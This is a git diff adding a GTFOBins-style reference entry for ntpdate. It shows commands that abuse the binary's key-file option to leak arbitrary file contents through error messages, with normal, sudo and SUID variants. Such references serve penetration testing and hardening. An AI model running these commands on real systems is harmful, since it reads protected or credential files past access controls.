diff --git a/_gtfobins/ntpdate.md b/_gtfobins/ntpdate.md new file mode 100644 index 0000000..27dc510 --- /dev/null +++ b/_gtfobins/ntpdate.md @@ -0,0 +1,16 @@ +--- +description: The file is actually parsed and lines are leaked through error messages. +functions: + file-read: + - code: | + LFILE=file_to_read + ntpdate -a x -k $LFILE -d localhost + sudo: + - code: | + LFILE=file_to_read + sudo ntpdate -a x -k $LFILE -d localhost + suid: + - code: | + LFILE=file_to_read + ./ntpdate -a x -k $LFILE -d localhost +---